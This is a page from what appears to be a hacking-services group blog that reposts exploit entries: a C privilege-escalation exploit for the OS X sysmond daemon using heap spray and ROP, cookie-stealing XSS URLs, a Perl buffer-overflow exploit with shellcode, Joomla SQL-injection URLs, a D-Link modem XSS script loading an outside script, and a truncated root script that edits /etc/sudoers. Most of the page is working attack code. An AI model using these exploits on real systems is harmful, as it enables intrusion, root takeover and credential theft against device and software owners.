Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863114952

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
/*
  Source: https://code.google.com/p/google-security-research/issues/detail?id=121
*/

/*
  tested on OS X 10.9.5 - uses some hard-coded offsets which will have to be fixed-up for other versions!

  this poc uses liblorgnette to resolve some private symbols; grab the code from github:
  git clone https://github.com/rodionovd/liblorgnette.git

  build this PoC with:
  clang -o sysmond_exploit_writeup sysmond_exploit_writeup.c liblorgnette/lorgnette.c -framework CoreFoundation

  sysmond is a daemon running as root. You can interact with sysmond via XPC ("com.apple.sysmond".)

  sub_100001AAF calls sub_100003120 passing the xpc dictionary received from the attacker. This function
  allocates a sysmond_request object and fills in fields from the attacker-controlled xpc request dictionary:

  ;read a uint64 with the key "Type"
__text:0000000100003144                 mov     rax, cs:_SYSMON_XPC_KEY_TYPE_ptr
__text:000000010000314B                 mov     rsi, [rax]
__text:000000010000314E                 mov     rdi, r14
__text:0000000100003151                 call    _xpc_dictionary_get_uint64
__text:0000000100003156                 mov     [rbx+20h], rax                ;rbx points to sysmond_request

  ;read anything with the key "Attributes"
__text:000000010000315A                 mov     rax, cs:_SYSMON_XPC_KEY_ATTRIBUTES_ptr
__text:0000000100003161                 mov     rsi, [rax]
__text:0000000100003164                 mov     rdi, r14
__text:0000000100003167                 call    _xpc_dictionary_get_value
__text:000000010000316C                 mov     [rbx+28h], rax
... continues parsing more fields

  The sysmond_request is returned from this function and passed as the first argument to sub_10000337D:

__text:000000010000337D sub_10000337D   proc near               ; CODE XREF: sub_100001AAF+4Bp
__text:000000010000337D
__text:000000010000337D var_38          = qword ptr -38h
__text:000000010000337D var_30          = dword ptr -30h
__text:000000010000337D var_2C          = dword ptr -2Ch
__text:000000010000337D var_28          = qword ptr -28h
__text:000000010000337D var_20          = qword ptr -20h
__text:000000010000337D var_18          = qword ptr -18h
__text:000000010000337D
__text:000000010000337D                 push    rbp
__text:000000010000337E                 mov     rbp, rsp
__text:0000000100003381                 push    r14
__text:0000000100003383                 push    rbx
__text:0000000100003384                 sub     rsp, 30h
__text:0000000100003388                 mov     rbx, rdi          ; sysmond_request pointer
__text:000000010000338B                 mov     rdi, [rbx+20h]    ; "Type" uint64 value in the xpc request dictionary
__text:000000010000338F                 mov     rsi, [rbx+28h]    ; "Attributes" value in the xpc request dictionary
__text:0000000100003393                 call    sub_100003454

  this function extracts the Type and Attribute values and passes them to sub_100003454:

__text:0000000100003454 sub_100003454 proc near   ; CODE XREF: sub_10000337D+16p
__text:0000000100003454                           ; handler+C0 p
__text:0000000100003454                 push    rbp
__text:0000000100003455                 mov     rbp, rsp
__text:0000000100003458                 push    r15
__text:000000010000345A                 push    r14
__text:000000010000345C                 push    r12
__text:000000010000345E                 push    rbx
__text:000000010000345F                 mov     r12, rsi          ; this is "Attributes" value
__text:0000000100003462                 mov     r14, rdi          ; which was read from the dictionary with xpc_dictionary_get_value
__text:0000000100003465                 mov     rdi, r12          ; meaning it could be any xpc type
__text:0000000100003468                 call    _xpc_data_get_length   ; use "Attributes" value as an xpc_data object
__text:000000010000346D                 mov     r15, rax
__text:0000000100003470                 mov     rdi, r15        ; size_t
__text:0000000100003473                 call    _malloc
__text:0000000100003478                 mov     rbx, rax
__text:000000010000347B                 mov     rdi, r12
__text:000000010000347E                 mov     rsi, rbx
__text:0000000100003481                 xor     edx, edx
__text:0000000100003483                 mov     rcx, r15
__text:0000000100003486                 call    _xpc_data_get_bytes ; use "Attributes" value again interpreted as an xpc_data

  the xpc_data_get_bytes call is the interesting one:

__text:00000000000114BE _xpc_data_get_bytes proc near
__text:00000000000114BE                 push    rbp
__text:00000000000114BF                 mov     rbp, rsp
...
__text:00000000000114D2                 mov     r14, rsi
__text:00000000000114D5                 mov     r13, rdi
__text:00000000000114D8                 cmp     qword ptr [r13+28h], 0FFFFFFFFFFFFFFFFh
__text:00000000000114DD                 jnz     short loc_11515
...
__text:0000000000011515                 lea     rdi, [r13+28h]  ; predicate
__text:0000000000011519                 lea     rdx, __xpc_data_map_once ; function
__text:0000000000011520                 mov     rsi, r13        ; context
__text:0000000000011523                 call    _dispatch_once_f

  here, if the value at +28h isn't -1 then our xpc object will be passed as the context to __xpc_data_map_once:

__text:00000000000028E9 __xpc_data_map_once proc near           ; DATA XREF: _xpc_data_get_bytes_ptr+1Fo
__text:00000000000028E9                                         ; __xpc_data_equal+46ao ...
__text:00000000000028E9                 push    rbp
__text:00000000000028EA                 mov     rbp, rsp
__text:00000000000028ED                 push    r14
__text:00000000000028EF                 push    rbx
__text:00000000000028F0                 mov     rbx, rdi                   ; controlled xpc object
__text:00000000000028F3                 cmp     byte ptr [rbx+48h], 0      ; if the byte at +48h is 0
__text:00000000000028F7                 jnz     short loc_291E
__text:00000000000028F9                 mov     rdi, [rbx+30h]             ; then pass the pointer at +30h
__text:00000000000028FD                 lea     rsi, [rbx+38h]
__text:0000000000002901                 lea     rdx, [rbx+40h]
__text:0000000000002905                 call    _dispatch_data_create_map  ; to dispatch_data_create_map
__text:000000000000290A                 mov     r14, rax
__text:000000000000290D                 mov     rdi, [rbx+30h]  ; object
__text:0000000000002911                 call    _dispatch_release          ; and then to dispatch_release

  we can return early from dispatch_data_create_map by setting the value at +28h from the pointer passed as the first arg to 0:

__text:00000000000012B6 _dispatch_data_create_map proc near     ; CODE XREF: __dispatch_data_subrange_map+34p
__text:00000000000012B6                                         ; __dispatch_operation_perform+DEap
__text:00000000000012B6
__text:00000000000012B6                 push    rbp
__text:00000000000012B7                 mov     rbp, rsp
__text:00000000000012BA                 push    r15
__text:00000000000012BC                 push    r14
__text:00000000000012BE                 push    r13
__text:00000000000012C0                 push    r12
__text:00000000000012C2                 push    rbx
__text:00000000000012C3                 sub     rsp, 38h
__text:00000000000012C7                 mov     [rbp+var_58], rdx
__text:00000000000012CB                 mov     r15, rsi
__text:00000000000012CE                 mov     r14, rdi
__text:00000000000012D1                 mov     r12, [r14+28h]          ; if this is 0
__text:00000000000012D5                 test    r12, r12
__text:00000000000012D8                 jz      short loc_131C          ; jumps to early return without disturbing anything else

  we then reach the call to dispatch_release which is passing the pointer at +30h of the xpc object we control (the API believes this is an xpc_data object)
  this ends up calling _dispatch_objc_release which sends the objective c "release" message to the object.

  We'll come back to how to get code code execution from that later.

  The crux of the bug is that the value of the "Attributes" key in the request dictionary is never validated to actually be an xpc_data object and the gets
  passed to functions expecting an xpc_data. In order to exploit this we need to have a value of a type other than xpc_data as the "Attributes" value
  in the request dictionary - specifically one where the offsets outlined above have suitably controlled values:

  +28h qword 0
  +30h pointer to controlled data
  +48h byte 0

  the xpc_uuid type comes the closest to fulfilling these requirements. We completely control the 16 bytes from +28h so the first two constraints are easily
  satisfied. Heap spraying is very reliable and fast in xpc, we can easily map a gigabyte of data into sysmond at a predicable address so we can point the
  pointer at +30h to that.

  The xpc_uuid object is only 40h bytes though, so we have no control over the byte at +48h which must be 0...

  OS X uses magazine malloc which is a heap-based allocator. It has three broad size classes (x<1k = tiny; 1k<x<15k = small; x>15k = large) and within these
  it will allocate approximately contiguously (using size-based free-lists to speed things up) with no inline-metadata which means there's a
  reasonable expectation that sequential allocations of similar sizes will be contiguous.

  Our xpc_uuid object is allocated when the request dictionary is received, so what's the next thing which is allocated?
  xpc_dictionaries have 6 hash buckets which store the heads of linked-lists for each bucket. As the dictionary is being deserialized first the value of a
  key is deserialized (allocating in this case the xpc_uuid) object then the entry is added to the linked-list (allocting a new linked-list entry struct.)

  The structure of a linked-list entry is approximately:

  struct ll {
    struct ll* forward;
    struct ll* backward;
    xpc_object_t* object;
    uint64_t flags;
    char key[0];
  }

  This is a variable-size struct - the key is allocated inline. If the xpc_uuid is immediately followed in memory by its linked-list entry the the value at +48
  will be the least-significant byte of the backward linked-list pointer. Our only requirement is that this byte be 0, which is easily achieved by ensuring that
  the previous linked-list entry struct in the list (which this linked-list entry points to) was allocated with an alignment of at least 256 bytes.
  The magazine malloc "small" size class heap chunks all have an alignment
  of 512 bytes meaning that we just need the linked-list entry prior to the xpc_uuid to be between 1k and 15k. In order for the key to end up in the right linked-list
  when it's deserialized we also need to make sure that the long key hashes to the same hash as "Attributes" - since there are only 6 possible hash values this is trivial.

  Finally, we can add another xpc_data object to the reqest dictionary with a gigabyte of heapspray as the value - this will be mapped into sysmond at a suitably
  predictable address meaning we can set the high 8 bytes of the uuid value to point to this.

  At this point we control a pointer to an objective-c object and the code will call objc_msgSend to "send a message" to our controlled object, which is the
  objective-c paradigm for calling methods. Let's look at the implementation of this to see how we can turn that into instruction pointer control:

__text:000000000000117F __dispatch_objc_release proc near       ; CODE XREF: _dispatch_release:loc_117Aj
__text:000000000000117F                                         ; _dispatch_data_create_subrange+183_p ...
__text:000000000000117F                 mov     rax, rdi
__text:0000000000001182                 cmp     cs:__os_object_have_gc, 0
__text:0000000000001189                 jnz     short loc_119E
__text:000000000000118B                 mov     rcx, cs:msgRef_release__objc_msgSend_fixup
__text:0000000000001192                 lea     rsi, msgRef_release__objc_msgSend_fixup
__text:0000000000001199                 mov     rdi, rax
__text:000000000000119C                 jmp     rcx


  rdi points to our heap sprayed fake objective-c object. This code sets rsi to point to the msgRef_release__objc_msgSend_fixup structure then calls the value at that address
  which is objc_msgSend_fixup. msgRef_release__objc_msgSend_fixup is in the __objc_msgrefs section of the data segment and in lldb we can see that at runtime is has the following
  contents:

  { /usr/lib/libobjc.A.dylib`objc_msgSend_fixedup, "release" }

  and the implementation of objc_msgSend_fixedup is:

(lldb) disassemble --name objc_msgSend_fixedup
libobjc.A.dylib`objc_msgSend_fixedup:
   0x7fff91d5d1c4:  mov    RSI, QWORD PTR [RSI + 8]
   0x7fff91d5d1c8:  jmpq   0x7fff91d5d080            ; objc_msgSend

  which just calls through to objc_msgSend passing the address of the "release" string as the second argument:

(lldb) disassemble --name objc_msgSend
libobjc.A.dylib`objc_msgSend:
   0x7fff91d5d080:  test   RDI, RDI
   0x7fff91d5d083:  je     0x7fff91d5d0f8
   0x7fff91d5d086:  test   DIL, 1
   0x7fff91d5d08a:  jne    0x7fff91d5d10f
   0x7fff91d5d091:  mov    R11, QWORD PTR [RDI]         ; rdi points to controlled fake objective-c object - read pointer to objective-c class
   0x7fff91d5d094:  mov    R10, RSI                     ; copy selector (pointer to string of method to call) to r10
   0x7fff91d5d097:  and    R10D, DWORD PTR [R11 + 24]   ; mask off n upper bits of the pointer according to value of fake_class+18h
   0x7fff91d5d09b:  shl    R10, 4                       ;
   0x7fff91d5d09f:  add    R10, QWORD PTR [R11 + 16]    ; use that masked off value as an index into a cache array pointed to by fake_class+10h
   0x7fff91d5d0a3:  cmp    RSI, QWORD PTR [R10]         ; does the cache entry selector match the selector passed as the second arg?
   0x7fff91d5d0a6:  jne    0x7fff91d5d0ac
   0x7fff91d5d0a8:  jmp    QWORD PTR [R10 + 8]          ; if so, then call the cached function implementation address

  Objective-c classses cache the addresses of the selector strings, not the contents of the strings so in order to exploit this we need to be able
  to find the address of the "release" selector passed by _dispatch_objc_release so we can construct a fake selector cache.
  All these libraries are loaded at the same address in all processes so we can just find the selector address in this process and it'll be valid for sysmond.

  Having done this we get instruction pointer control. At this point rax and rdi point to the heap spray so this PoC uses a pivot gadget in CoreFoundation
  to move the stack to point into the heap spray and ROP to a system() call with controlled string :)
*/


#include <dlfcn.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

#include <xpc/xpc.h>
#include <CoreFoundation/CoreFoundation.h>

#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/task.h>

#include <mach-o/dyld_images.h>

#include "liblorgnette/lorgnette.h"

/* find the base address of CoreFoundation for the ROP gadgets */

void* find_library_load_address(const char* library_name){
  kern_return_t err;

  // get the list of all loaded modules from dyld
  // the task_info mach API will get the address of the dyld all_image_info struct for the given task
  // from which we can get the names and load addresses of all modules
  task_dyld_info_data_t task_dyld_info;
  mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT;
  err = task_info(mach_task_self(), TASK_DYLD_INFO, (task_info_t)&task_dyld_info, &count);

  const struct dyld_all_image_infos* all_image_infos = (const struct dyld_all_image_infos*)task_dyld_info.all_image_info_addr;
  const struct dyld_image_info* image_infos = all_image_infos->infoArray;
  
  for(size_t i = 0; i < all_image_infos->infoArrayCount; i++){
    const char* image_name = image_infos[i].imageFilePath;
    mach_vm_address_t image_load_address = (mach_vm_address_t)image_infos[i].imageLoadAddress;
    if (strstr(image_name, library_name)){
      return (void*)image_load_address;
    }
  }
  return NULL;
}


struct heap_spray {
  void* fake_objc_class_ptr; // -------+
  uint8_t pad0[0x10];        //        |
  uint64_t first_gadget;     //        |
  uint8_t pad1[0x8];         //        |
  uint64_t null0;            //        |
  uint64_t pad3;             //        |
  uint64_t pop_rdi_rbp_ret;  //        |
  uint64_t rdi;              //        |
  uint64_t rbp;              //        |
  uint64_t system;           //        |
  struct fake_objc_class_t { //        |
    char pad[0x10];      // <----------+
    void* cache_buckets_ptr; //--------+
    uint64_t cache_bucket_mask;  //    |
  } fake_objc_class;             //    |
  struct fake_cache_bucket_t {   //    |
    void* cached_sel;      // <--------+  //point to the right selector
    void* cached_function; // will be RIP :)
  } fake_cache_bucket;
  char command[256];
};


int main(){
  // create the XPC connection to sysmond
  xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.sysmond", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);

  xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
    xpc_type_t t = xpc_get_type(event);
    if (t == XPC_TYPE_ERROR){
      printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
    }
    printf("received an event\n");
  });
  xpc_connection_resume(conn);

  xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);



  void* heap_spray_target_addr = (void*)0x120202000;
  struct heap_spray* hs = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0);
  memset(hs, 'C', 0x1000);
  hs->null0 = 0;
  hs->fake_objc_class_ptr = &hs->fake_objc_class;
  hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket;
  hs->fake_objc_class.cache_bucket_mask = 0;

  // nasty hack to find the correct selector address :)
  uint8_t* ptr = (uint8_t*)lorgnette_lookup(mach_task_self(), "_dispatch_objc_release");
  uint64_t* msgrefs = ptr + 0x1a + (*(int32_t*)(ptr+0x16)); //offset of rip-relative offset of selector 
  uint64_t sel = msgrefs[1];
  printf("%p\n", sel);
  hs->fake_cache_bucket.cached_sel = sel;

  uint8_t* CoreFoundation_base = find_library_load_address("CoreFoundation");
  // pivot:
/*
push rax
add eax, [rax]
add [rbx+0x41], bl
pop rsp
pop r14
pop r15
pop rbp
ret
*/
  hs->fake_cache_bucket.cached_function = CoreFoundation_base + 0x46ef0; //0x414142424343; // ROP from here

  // jump over the NULL then so there's more space:
  //pop, pop, pop, ret: //and keep stack correctly aligned
  hs->first_gadget = CoreFoundation_base + 0x46ef7;

  hs->pop_rdi_rbp_ret = CoreFoundation_base + 0x2226;
  hs->system = dlsym(RTLD_DEFAULT, "system");

  hs->rdi = &hs->command;
  strcpy(hs->command, "touch /tmp/hello_root");


  size_t heap_spray_pages = 0x40000;
  size_t heap_spray_bytes = heap_spray_pages * 0x1000;
  char* heap_spray_copies = malloc(heap_spray_bytes);
  for (int i = 0; i < heap_spray_pages; i++){
    memcpy(heap_spray_copies+(i*0x1000), hs, 0x1000);
  }

  xpc_dictionary_set_data(msg, "heap_spray", heap_spray_copies, heap_spray_bytes);

  xpc_dictionary_set_uint64(msg, "Type", 1);

  xpc_dictionary_set_uint64(msg, "Interval", 0);
  
  xpc_connection_t xc = xpc_connection_create(NULL, NULL);
  xpc_dictionary_set_connection(msg, "Connection", xc);
 
  // this has the same xpc dictionary hash as "Attributes"
  char* long_key = malloc(1024);
  memset(long_key, 'A', 1023);
  long_key[1023] = '\x00';

  xpc_dictionary_set_string(msg, long_key, "something or other that's not important");
  
  uint64_t uuid[] = {0, 0x120202000};
  xpc_dictionary_set_uuid(msg, "Attributes", (const unsigned char*)uuid);

  xpc_object_t reply = xpc_connection_send_message_with_reply_sync(conn, msg);

  printf("send and received\n");
  
  xpc_release(msg);
  return 0;
  for(;;){
    CFRunLoopRunInMode(kCFRunLoopDefaultMode, DBL_MAX, TRUE);
  }
  return 0;
}
HireHackking 
source: https://www.securityfocus.com/bid/47845/info

The Flash Tag Cloud widget and the MT-Cumulus Plugin are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.

The following versions are affected:

Flash Tag Cloud For MT 4
MT-Cumulus 1.02 and prior versions 

http://www.example.com/scripts/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://www.example.com/mt/mt-static/plugins/Cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
HireHackking 
source: https://www.securityfocus.com/bid/47851/info

AVS Ringtone Maker is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition.

AVS Ringtone Maker 1.6.1 is vulnerable; other versions may also be affected. 

#!/usr/bin/perl
system("cls");
sub logo(){
print q'
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1                      ______                                          0
0                   .-"      "-.                                       1
1                  / KedAns-Dz  \ =-=-=-=-=-=-=-=-=-=-=-|              0
0 Algerian HaCker |              | > Site : 1337day.com |              1
1 --------------- |,  .-.  .-.  ,| > Twitter : @kedans  |              0
0                 | )(_o/  \o_)( | > ked-h@hotmail.com  |              1
1                 |/     /\     \| =-=-=-=-=-=-=-=-=-=-=|              0
0       (@_       (_     ^^     _)  HaCkerS-StreeT-Team                1
1  _     ) \_______\__|IIIIII|__/_______________________               0
0 (_)@8@8{}<________|-\IIIIII/-|________________________>              1
1        )_/        \          /                                       0
0       (@           `--------` � 2011, Inj3ct0r Team                  1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
0       AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit                1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
';
}
logo();
###
# Title : AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page : twitter.com/kedans
# platform : windows
# Tested on : Windows XP sp3 FR 
##
# Drag And Drop This File to edit Window & Start Upload >> Bo0M CalC !
###

my $junk = "\x41" x 4123 ; # Buffer Junk
my $jump = "\xeb\x06\x90\x90"; #  Short Jump
my $eip = pack("V", 0x00401E3C); # EIP
my $seh = pack("V", 0x7C839AC0); # SEH

# windows/exec - 511 bytes ( http://www.metasploit.com)
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, CMD=calc.exe
my $shellcode = "\xe8\x52\xe6\xff\xff\x90\x90".
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x49" .
"\x78\x4d\x59\x47\x70\x43\x30\x43\x30\x43\x50\x4e\x69\x49" .
"\x75\x46\x51\x4b\x62\x42\x44\x4e\x6b\x46\x32\x46\x50\x4c" .
"\x4b\x43\x62\x44\x4c\x4c\x4b\x42\x72\x47\x64\x4e\x6b\x51" .
"\x62\x51\x38\x44\x4f\x4e\x57\x43\x7a\x44\x66\x44\x71\x4b" .
"\x4f\x45\x61\x49\x50\x4c\x6c\x45\x6c\x43\x51\x51\x6c\x46" .
"\x62\x44\x6c\x51\x30\x49\x51\x48\x4f\x44\x4d\x47\x71\x49" .
"\x57\x4a\x42\x4c\x30\x42\x72\x50\x57\x4c\x4b\x51\x42\x44" .
"\x50\x4c\x4b\x51\x52\x45\x6c\x46\x61\x4e\x30\x4c\x4b\x47" .
"\x30\x50\x78\x4d\x55\x49\x50\x42\x54\x43\x7a\x43\x31\x4a" .
"\x70\x42\x70\x4c\x4b\x51\x58\x44\x58\x4e\x6b\x50\x58\x45" .
"\x70\x46\x61\x4e\x33\x48\x63\x45\x6c\x50\x49\x4c\x4b\x44" .
"\x74\x4c\x4b\x46\x61\x49\x46\x46\x51\x4b\x4f\x44\x71\x4f" .
"\x30\x4e\x4c\x49\x51\x48\x4f\x44\x4d\x43\x31\x48\x47\x45" .
"\x68\x49\x70\x42\x55\x49\x64\x43\x33\x51\x6d\x49\x68\x47" .
"\x4b\x43\x4d\x47\x54\x51\x65\x4a\x42\x51\x48\x4c\x4b\x42" .
"\x78\x51\x34\x47\x71\x4b\x63\x50\x66\x4c\x4b\x44\x4c\x50" .
"\x4b\x4c\x4b\x50\x58\x47\x6c\x43\x31\x4a\x73\x4c\x4b\x43" .
"\x34\x4e\x6b\x45\x51\x4a\x70\x4b\x39\x47\x34\x51\x34\x44" .
"\x64\x51\x4b\x43\x6b\x43\x51\x46\x39\x50\x5a\x42\x71\x4b" .
"\x4f\x4b\x50\x51\x48\x43\x6f\x42\x7a\x4e\x6b\x45\x42\x4a" .
"\x4b\x4f\x76\x51\x4d\x50\x6a\x46\x61\x4c\x4d\x4f\x75\x48" .
"\x39\x43\x30\x43\x30\x45\x50\x42\x70\x50\x68\x46\x51\x4e" .
"\x6b\x42\x4f\x4e\x67\x49\x6f\x4a\x75\x4d\x6b\x49\x6e\x44" .
"\x4e\x46\x52\x4a\x4a\x51\x78\x4e\x46\x4a\x35\x4d\x6d\x4f" .
"\x6d\x49\x6f\x4a\x75\x45\x6c\x46\x66\x51\x6c\x44\x4a\x4f" .
"\x70\x49\x6b\x49\x70\x42\x55\x46\x65\x4f\x4b\x50\x47\x45" .
"\x43\x51\x62\x42\x4f\x43\x5a\x43\x30\x42\x73\x49\x6f\x4e" .
"\x35\x42\x43\x45\x31\x50\x6c\x51\x73\x44\x6e\x43\x55\x51" .
"\x68\x50\x65\x47\x70\x41\x41";
my $exploit = $junk.$jump.$eip.$seh.$shellcode;
open (FILE ,'> KedAns.wav');
print FILE $exploit;
HireHackking 
source: https://www.securityfocus.com/bid/47856/info

The 'com_cbcontact' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_cbcontact&task=vcard&contact_id=-11[SQLi]
http://www.example.com/index.php?option=com_cbcontact&task=view&contact_id=-11[SQLi]
HireHackking 
# Exploit Title: D-Link DSL-2730B Modem wlsecrefresh.wl & wlsecurity.wl Exploit XSS Injection Stored
# Date: 11-01-2015
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.dlink.com
# Hardware version: C1
# Version: GE 1.01
# Tested on: Windows 8 and Linux

#!/usr/bin/perl
#
# Date dd-mm-aaaa: 11-11-2014
# Exploit for D-Link DSL-2730B
# Cross Site Scripting (XSS Injection) Stored in wlsecrefresh.wl
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
# More informations: www.xlabs.com.br/blog/?p=339
#
# CAUTION!
# This exploit disables some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#



use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;


                my $ip = $ARGV[0];
                my $user = $ARGV[1];
                my $pass = $ARGV[2];
                my $opt = $ARGV[3];
                $ip = $1 if($ip=~/(.*)\/$/);

                               if (@ARGV != 4){

                                               print "\n";
                                               print "XLabs Information Security www.xlabs.com.br\n";
                                               print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\n";
                                               print "Developed by Mauricio Correa\n";
                                               print "Contact: mauricio\@xlabs.com.br\n";
                                               print "Usage: perl $0 http:\/\/host_ip\/ user pass option\n";
                                               print "\n";
                                               print "Options: 1 - Parameter: wlAuthMode \n";
                                               print "   2 - Parameter: wl_wsc_reg \n ";
                                               print "   3 - Parameter: wl_wsc_mode \n";
                                               print "   4 - Parameter: wlWpaPsk (Execute on click to exibe Wireless password) \n";
                               }else{

                                               print "XLabs Information Security www.xlabs.com.br\n";
                                               print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\n";
                                               print "Developed by Mauricio Correa\n";
                                               print "Contact: mauricio\@xlabs.com.br\n";
                                               print "[+] Exploring $ip\/ ...\n";

                                               my $payload = "%27;alert(%27\/\/XLabsSec%27);\/\/";
                                               my $ua = new LWP::UserAgent;
                                               my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );
                                               $hdrs->authorization_basic($user, $pass);

                                               chomp($ip);

                                               print "[+] Preparing...\n";
                                               my $url_and_payload = "";

                                               if($opt == 1){
                                                               $url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled&wl_wsc_reg=disabled&wlAuth=0&wlAuthMode=1$payload".
                                                                                                                                   "&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
                                               }elsif($opt == 2){
                                                               $url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled&wl_wsc_reg=disabled$payload&wlAuth=0&wlAuthMode=997354".
                                                                                                                                               "&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";

                                   }elsif($opt == 3){

                                                   $payload = "%27;alert(%27\/\/XLabsSec%27);\/\/";
                                                               $url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled$payload&wl_wsc_reg=disabled&wlAuth=0&wlAuthMode=997354".
                                                                                                                                               "&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";

                                               }elsif($opt == 4){

                                                               $payload = "GameOver%3Cscript%20src%3D%22http%3A%2f%2fxlabs.com.br%2fxssi.js%22%3E%3C%2fscript%3E";
                                                               $url_and_payload = "$ip/wlsecurity.wl?wl_wsc_mode=enabled&wl_wsc_reg=disabled&wsc_config_state=0&wlAuthMode=psk%20psk2&wlAuth=0&".
                                                                                                                                "wlWpaPsk=$payload&wlWpaGtkRekey=0&wlNetReauth=36000&wlWep=disabled&wlWpa=aes&wlKeyBit=0&wlPreauth=0&".
                                                                                                                                "wlSsidIdx=0&wlSyncNvram=1";

                                               }else{

                                                               print "[-] Chose one option!\n";
                                                               exit;
                                               }

                                               my $req = new HTTP::Request("GET",$url_and_payload,$hdrs);

                                               print "[+] Prepared!\n";
                                               print "[+] Requesting...\n";
                                               my $resp = $ua->request($req);
                                               if ($resp->is_success){

                                               print "[+] Successfully Requested!\n";

                                               my $resposta = $resp->as_string;

                                               print "[+] Checking for properly explored...\n";
                                               my $url = "$ip/wlsecurity.html";
                                               $req = new HTTP::Request("GET",$url,$hdrs);

                                               print "[+] Checking that was explored...\n";

                                               my $resp2 = $ua->request($req);

                                                               if ($resp2->is_success){
                                                                              my $result = $resp2->as_string;
                                                                              if($opt == 4){
                                                                                              $payload = "%27GameOver%3Cscript%20src%3D%5C%22http%3A%2f%2fxlabs.com.br%2fxssi.js%5C%22%3E%3C%2fscript%3E%27";
                                                                              }

                                                                              if(index($result, uri_unescape($payload)) != -1){
                                                                              print "[+] Successfully Exploited!";
                                                                              }else{
                                                                              print "[-] Not Exploited!";
                                                                              }
                                                               }
                                               }else {

                                               print "[-] Ops!\n";
                                               print $resp->message;
                                               }
}
HireHackking 
#!/bin/bash -e

## Alternative steps: https://pbs.twimg.com/media/B68inqBIQAA5sK6.png
## Proof: https://github.com/HackerFantastic/Public/blob/master/exploits/redstar3.0-localroot.png

cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak
echo 'RUN+="/bin/bash /tmp/r00t.sh"' > /etc/udev/rules.d/85-hplj10xx.rules
cat <<EOF >/tmp/r00t.sh
echo -e "ALL\tALL=(ALL)\tNOPASSWD: ALL" >> /etc/sudoers
